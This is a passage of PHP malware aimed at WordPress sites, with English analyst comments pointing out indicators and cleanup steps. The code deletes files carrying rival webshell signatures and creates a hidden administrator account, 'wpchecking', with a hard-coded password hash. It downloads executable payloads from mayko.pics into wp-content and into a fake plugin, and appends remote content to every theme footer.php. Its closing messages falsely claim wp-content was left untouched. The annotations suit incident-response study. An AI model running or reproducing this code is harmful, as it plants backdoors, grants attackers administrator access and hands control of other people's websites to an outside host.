$deleted = [];
$skipped = [];
foreach ($files as $file) {
if (in_array(basename($file), $excludedFileNames)) continue;
$content = @file_get_contents($file);
if ($content === false) continue;
foreach ($patterns as $pattern) {
if (preg_match("/" . preg_quote($pattern, "/") . "/i", $content)) {
if (is_writable($file)) {
// The unlink() result is not checked; the path is reported as deleted either way.
unlink($file);
$deleted[] = $file;
} else {
$skipped[] = $file;
}
break;
}
}
}
return [$deleted, $skipped];
}
// Malicious patterns
// Analyst note: these are literal markers; any .php file under this directory that
// contains one of them is deleted outright. The step runs BEFORE the remote files
// fetched further down are written, so those files are not subject to this scan.
// This reads as removal of other parties' code rather than as a cleanup of the
// site (interpretation; the code itself only shows the ordering).
$patterns = [
'eval(base64_decode',
'BiaoJiOk',
'Graybyte LoginPress',
'time())); goto',
'<?php include base64_decode(',
'<?php error_reporting(0);',
'0 and md5(md5',
'htmlspecialchars_decode(gzinflate(base64_decode',
'By Shadow',
'<?php @include base64_decode',
'session_start(); goto',
'CURLOPT_FOLLOWLOCATION, 0); goto',
'<pre align=center><form method=post>Password:',
"=='))); ?>"
];
// 'tara.php' is a third file name this tool refers to (besides the two protected ones).
$excludedFileNames = ['tara.php']; // so that it does not delete itself
$scanDir = __DIR__;
// The running script is excluded by full path because it contains the markers itself.
$files = listFiles($scanDir, __FILE__);
list($deleted, $skipped) = scanAndDelete($files, $patterns, $excludedFileNames);
// Report: "Scan completed", "Deleted files (n)", "Could not delete (permission problem)",
// "No malicious file was found."
echo "<h2>Tarama Tamamlandı</h2>";
echo "<h3 style='color:red;'>Silinen Dosyalar (" . count($deleted) . ")</h3><ul>";
foreach ($deleted as $f) {
echo "<li>$f</li>";
}
echo "</ul>";
if (!empty($skipped)) {
echo "<h3 style='color:orange;'>Silinemeyenler (izin problemi)</h3><ul>";
foreach ($skipped as $f) {
echo "<li>$f</li>";
}
echo "</ul>";
}
if (empty($deleted) && empty($skipped)) {
echo "<p style='color:green;'>Hiç zararlı dosya bulunamadı.</p>";
}
/**
 * Return the on-disk path of the running script.
 *
 * When __FILE__ is not an existing file, the part of it that precedes a
 * "(<number>) :" suffix is returned instead. PHP reports __FILE__ in that form
 * for code executed through eval(), so this fallback suggests the code was also
 * meant to run that way (presumably; nothing else in the listing confirms it).
 *
 * @return string|null Path, or null when neither form matches.
 */
function get_file_name()
{
if (file_exists(__FILE__)) {
return __FILE__;
}
preg_match_all('/(.+?)(?=\(\d+\)\s*:\s*)/', __FILE__, $m, PREG_PATTERN_ORDER);
if (isset($m[1]) && isset($m[1][0])) {
return $m[1][0];
}
}
// Locate a WordPress installation by walking up to 8 directory levels from the
// script's location and load it once both marker files are found.
$dir = get_file_name();
for ($i = 1; $i <= 8; $i++) {
$dir = rtrim(dirname($dir), DIRECTORY_SEPARATOR);
$f1 = $dir . DIRECTORY_SEPARATOR . "wp-blog-header.php";
$f2 = $dir . DIRECTORY_SEPARATOR . "wp-includes/registration.php";
if (file_exists($f1) && file_exists($f2)) {
// "Buldu" = "Found", followed by the number of levels walked.
echo "Buldu " . $i;
require_once($f1);
require_once($f2);
break;
}
}
// BACKDOOR ACCOUNT: creates a WordPress user with the administrator role.
// Indicators to hunt for, all taken from the values below:
//   - a user whose login equals $a and whose role is administrator;
//   - a user_pass column holding exactly the 32-hex-character value written by the
//     UPDATE statement (the length of an MD5 digest, a legacy format WordPress
//     still accepts), meaning the effective password is fixed by that value
//     rather than by $b.
// Response: remove the account, then rotate all administrator passwords and the
// secret keys/salts in wp-config.php, since active sessions may already exist.
$ad = 'administrator';
$a = 'wpchecking';
$b = 'f00b@r!!a';
// '[email protected]' looks like the placeholder left by e-mail obfuscation on the
// page this listing was captured from; the original address is not recoverable here.
$c = '[email protected]';
// $newemail is not defined anywhere in the visible code.
if (!username_exists($a) && !email_exists($newemail)) {
$user_id = wp_create_user($a, $b, $c);
if (is_int($user_id)) {
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role($ad);
// Direct SQL write that replaces the stored password hash; errors are suppressed.
@$wpdb->query("Update `$wpdb->users` Set user_pass = '8dcd4bd55e3aae41c580b5b5bc48bf29' Where user_login = '" . $a . "'");
// Operator-facing message, roughly: "Admin succeeded. nazim, don't forget, this
// .php must stay in a hidden place!" -- i.e. the file is meant to remain on the host.
echo 'Admin basarili oldu. nazim unutma bu.php gizli yerde olsun!';
} else {
// "hata 1." = "error 1."
echo 'hata 1.';
}
} else {
// "This user exists, check it."
echo 'bu kullanıcı var kontrol et.';
}
// REMOTE PAYLOAD 1: the body of a URL on an external host is saved, unmodified and
// unverified, as a .php file inside wp-content. Whoever controls that URL decides
// what code ends up executable on this site.
// Indicators: outbound request to the host in $url; file wp-content/styles.php.
$url = 'https://mayko.pics/txt.txt';
$targetDir = __DIR__ . '/wp-content';
$targetFile = $targetDir . '/styles.php';
if (!is_dir($targetDir)) {
// "wp-content not found".
die('wp-content bulunamadı');
}
$data = @file_get_contents($url);
if ($data === false) {
// "Download failed".
die('İndirme başarısız');
}
if (@file_put_contents($targetFile, $data) === false) {
// "Save failed".
die('Kaydetme başarısız');
}
// REMOTE PAYLOAD 2: a second remote body is written as a .php file inside a newly
// created plugin-style folder. It is written after the plugin cleanup earlier in
// this file, so that cleanup does not remove it.
// Indicators: outbound request to the host in $url; directory
// wp-content/plugins/CustomWp and the file site-maintenance.php inside it.
$url = "https://mayko.pics/op.txt";
$saveDir = __DIR__ . "/wp-content/plugins/CustomWp";
$saveFile = $saveDir . "/site-maintenance.php";
// create the folder if it does not exist
if (!is_dir($saveDir)) {
mkdir($saveDir, 0755, true);
}
// fetch the content
$content = file_get_contents($url);
if ($content === false) {
// "File could not be downloaded!"
die("Dosya indirilemedi!");
}
// write to file
file_put_contents($saveFile, $content);
// THEME INJECTION: a third remote body is appended to every footer.php found under
// wp-content/themes, so the injected content is included wherever a theme renders
// its footer.
// Detection: compare each theme's footer.php with a known-good copy of the theme
// and look for content appended after the original end of the file; also watch for
// outbound requests to the host in $url.
$themesDir = __DIR__ . '/wp-content/themes';
$url = "https://mayko.pics/tm.txt";
// fetch the TXT content
$icerik = @file_get_contents($url);
if ($icerik === false) {
// "TXT could not be fetched!"
die("TXT çekilemedi!");
}
// add a newline before and after (to make it look tidier)
$icerik = "\n" . $icerik . "\n";
$count = 0;
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($themesDir, FilesystemIterator::SKIP_DOTS)
);
foreach ($iterator as $file) {
// File name match is case-insensitive and applies at any depth below themes/.
if ($file->isFile() && strtolower($file->getFilename()) === 'footer.php') {
$path = $file->getPathname();
// check so that the same content is not appended again and again
$mevcut = file_get_contents($path);
if (strpos($mevcut, trim($icerik)) === false) {
file_put_contents($path, $icerik, FILE_APPEND);
// "Eklendi" = "Added".
echo "Eklendi: $path<br>";
$count++;
} else {
// "Zaten var" = "Already present".
echo "Zaten var: $path<br>";
}
}
}
// "Total footer.php files processed", "Completed: <payload 2 path>",
// "Saved: <payload 1 path>".
echo "<hr>Toplam işlem yapılan footer.php: " . $count;
echo "Tamamlandı: " . $saveFile;
echo 'Kaydedildi: ' . htmlspecialchars($targetFile);
// Closing status lines: "OPERATION COMPLETED", "wp-config.php preserved",
// "wp-content preserved", "qinfofuns.php and yeni.php preserved",
// "Core files renewed from a clean copy".
// Analyst note: the "wp-content preserved" line does not match what the code above
// did; files were written into wp-content, a plugin folder was created, plugin
// folders were deleted and theme footer.php files were appended to.
out("ISLEM TAMAMLANDI");
out("wp-config.php korundu.");
out("wp-content korundu.");
out("qinfofuns.php ve yeni.php korundu.");
out("Core dosyalari temiz kopya ile yenilendi.");
echo "</pre>";